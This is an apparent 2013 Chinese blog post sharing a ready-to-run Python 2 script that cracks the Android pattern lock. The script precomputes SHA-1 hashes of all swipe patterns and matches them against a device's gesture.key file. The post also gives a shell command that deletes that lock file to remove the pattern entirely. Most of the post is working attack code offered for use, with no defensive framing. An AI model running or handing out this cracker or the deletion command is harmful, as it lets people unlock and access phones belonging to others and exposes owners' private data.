其实最早看到关于破解访问图案是在看雪的一篇文章中:http://bbs.pediy.com/showthread.php?t=166933。详细信息可以参考这篇文章,至于有什么不明白的那就去Google吧。
今天看到一份代码,用于生成哈希库,既然数据都有了,还不直接把搜索功能一块加进去?这不是蛋疼嘛。于是我自己完善了一下,可以直接用来对gesture.key进行搜索,免得自己去查找。当然了如果愿意自己去查也是很快的,生成的就是个文本数据库,直接用记事本打开查就行了。
当然这个东西也有局限性,就是开启了usb调试,能够访问设备上的文件,如果不想去破解,更简单的方法就是执行下面的指令直接将文件删除自然密码也就没了:
rm /data/system/gesture.ke |
脚本代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 | #coding:utf-8 #"=============================================" #"[*]Android lockscreen(gesture) cracker" #"[*]Updated by obaby QQ:289090351" #"[*]Mars Information Security" #"[*]http://www.h4ck.org.cn" #"[*]coding by g0t3n update by obaby #"=============================================" import sys import os import hashlib import struct import binascii from copy import deepcopy filehandle = None db = "./hash.db" init_mapper = [[0,0,0],[0,0,0],[0,0,0]] mapper_queue = [] # tmp_mapper,startx,starty,prev_path key_mapper = [['\x00','\x01','\x02'],['\x03','\x04','\x05'],['\x06','\x07','\x08']] def notfull(mapper): for x in range(3): for y in range(3): if (mapper[x][y] != 0): return True return False # 因为必须两个以上九个以下 def canwritelog(mapper): cnt = 0 for x in range(3): for y in range(3): if mapper[x][y] == 1: cnt += 1 if cnt > 2: return True return False def writelog(tmp, prev): strings = "" paths = "" for i in prev: x,y = i paths = paths + str(x)+str(y) strings = strings + key_mapper[x][y] #print "writelog: strings => "+strings + " | " +hashlib.sha1(strings).hexdigest() filehandle.write(paths+" | "+hashlib.sha1(strings).hexdigest()+'\n') def generatehashtable(): print "[*]Generate hash.db .........\n[*]Waiting..............." rounds = 1 for startxs in range(3): for startys in range(3): # start point to 0,0 #startx,starty = 0,0 cur_mapper = init_mapper init = 0 prev_path = [] startx,starty = startxs,startys while(True): if init == 0: # init tmp_mapper = deepcopy(cur_mapper) # u r not virgin tmp_mapper[startx][starty] = 1 prev_path.append((startx,starty)) init = 1 else: if len(mapper_queue) == 0: # 队列为空证明finish了 break tmp_mapper,startx,starty,prev_path = mapper_queue.pop() #print "head => "+repr(tmp_mapper) #print "mapper_queue =>"+repr(mapper_queue) if (startx+1 < 3) : # right tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx+1,starty)) if (tmp_mapper[startx+1][starty] != 1): # 如果该点本来为 1,即结束,即不再入栈 tmp[startx+1][starty] = 1 mapper_queue.append((tmp, startx+1, starty, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx-1 >= 0): # left tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx-1,starty)) if (tmp_mapper[startx-1][starty] != 1): tmp[startx-1][starty] = 1 mapper_queue.append((tmp, startx-1, starty, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (starty+1 < 3) : # down tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx,starty+1)) if (tmp_mapper[startx][starty+1] != 1): tmp[startx][starty+1] = 1 mapper_queue.append((tmp, startx, starty+1, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (starty-1 >= 0): # up tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx,starty-1)) if (tmp_mapper[startx][starty-1] != 1): tmp[startx][starty-1] = 1 mapper_queue.append((tmp, startx, starty-1, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! # 斜 一位 if (startx+1 < 3) and (starty+1 < 3): # right down tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx+1,starty+1)) if (tmp_mapper[startx+1][starty+1] != 1): tmp[startx+1][starty+1] = 1 mapper_queue.append((tmp, startx+1, starty+1, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx-1 >= 0) and (starty+1 < 3): # left down tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx-1,starty+1)) if (tmp_mapper[startx-1][starty+1] != 1): tmp[startx-1][starty+1] = 1 mapper_queue.append((tmp, startx-1, starty+1, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx-1 >= 0) and (starty-1 >= 0) : # left up tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx-1,starty-1)) if (tmp_mapper[startx-1][starty-1] != 1): tmp[startx-1][starty-1] = 1 mapper_queue.append((tmp, startx-1, starty-1, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx+1 < 3) and (starty-1 >= 0): # right up tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx+1,starty-1)) if (tmp_mapper[startx+1][starty-1] != 1): tmp[startx+1][starty-1] = 1 mapper_queue.append((tmp, startx+1, starty-1, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! # 斜 两位 if (startx+1 < 3) and (starty+2 < 3): tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx+1,starty+2)) if (tmp_mapper[startx+1][starty+2] != 1): tmp[startx+1][starty+2] = 1 mapper_queue.append((tmp, startx+1, starty+2, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx-1 >= 0) and (starty+2 < 3): tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx-1,starty+2)) if (tmp_mapper[startx-1][starty+2] != 1): tmp[startx-1][starty+2] = 1 mapper_queue.append((tmp, startx-1, starty+2, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx+1 < 3) and (starty-2 >= 0): tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx+1,starty-2)) if (tmp_mapper[startx+1][starty-2] != 1): tmp[startx+1][starty-2] = 1 mapper_queue.append((tmp, startx+1, starty-2, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx-1 >= 0) and (starty-2 >= 0): tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx-1,starty-2)) if (tmp_mapper[startx-1][starty-2] != 1): tmp[startx-1][starty-2] = 1 mapper_queue.append((tmp, startx-1, starty-2, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx+2 < 3) and (starty+1 < 3): tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx+2,starty+1)) if (tmp_mapper[startx+2][starty+1] != 1): tmp[startx+2][starty+1] = 1 mapper_queue.append((tmp, startx+2, starty+1, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx+2 < 3) and (starty-1 >= 0): tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx+2,starty-1)) if (tmp_mapper[startx+2][starty-1] != 1): tmp[startx+2][starty-1] = 1 mapper_queue.append((tmp, startx+2, starty-1, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx-2 >= 0) and (starty-1 >= 0): tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx-2,starty-1)) if (tmp_mapper[startx-2][starty-1] != 1): tmp[startx-2][starty-1] = 1 mapper_queue.append((tmp, startx-2, starty-1, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! if (startx-2 >= 0) and (starty+1 < 3): tmp = deepcopy(tmp_mapper) tmp_prev_path = deepcopy(prev_path) tmp_prev_path.append((startx-2,starty+1)) if (tmp_mapper[startx-2][starty+1] != 1): tmp[startx-2][starty+1] = 1 mapper_queue.append((tmp, startx-2, starty+1, tmp_prev_path)) if canwritelog(tmp): writelog(tmp, tmp_prev_path) # !!! #print "round "+str(rounds) rounds += 1 print "finished..." def cur_file_dir(): #获取脚本路径 path = sys.path[0] #判断为脚本文件还是py2exe编译后的文件,如果是脚本文件,则返回的是脚本的目录, #如果是py2exe编译后的文件,则返回的是编译后的文件路径 if os.path.isdir(path): return path elif os.path.isfile(path): return os.path.dirname(path) def printkeytable(): print "[*]Fallow the map below to enter the device:" print "[*]====================" print "[*]=00 01 02 | o o o=" print "[*]=10 11 12 | o o o=" print "[*]=20 21 22 | o o o=" print "[*]====================" def decrypthash(): print "[*]Hash database detected." #print cur_file_dir() + '\\' + sys.argv[1] if (len(sys.argv)<2) : print "[*]Please run the script file with key file name ." else: if os.path.isfile(cur_file_dir() + '\\' + sys.argv[1]): print "[*]Get key information now......" keyhandle = open(cur_file_dir() + '\\' + sys.argv[1],'rb') gesturebytes = keyhandle.read() gesturetext = binascii.b2a_hex(gesturebytes) print "[*]Crypted hash is :\n " + gesturetext print "[*]Decoding now....................." keyhandle.close() filehandle = open(db,'r') for line in filehandle: if not line.find(gesturetext)==-1: print "[*]Sucess cracked the gesture:" print line printkeytable() print "=============================================" filehandle.close() if __name__ == '__main__': print "=============================================" print "[*]Android lockscreen(gesture) cracker" print "[*]Updated by obaby QQ:289090351" print "[*]Mars Information Security" print "[*]http://www.h4ck.org.cn" print "[*]Thx tog0t3n for his/her orginal script" print "=============================================" print "[*]Detect if hash database is exists....." if os.path.isfile(db) == False: filehandle = open(db,'w') generatehashtable() decrypthash() else: decrypthash() |
原创文章,转载请注明: 转载自 obaby@mars
本文标题: 《Andoid 图形屏幕锁破解》
本文链接地址: http://h4ck.org.cn/2013/04/andoid-%e5%9b%be%e5%bd%a2%e5%b1%8f%e5%b9%95%e9%94%81%e7%a0%b4%e8%a7%a3/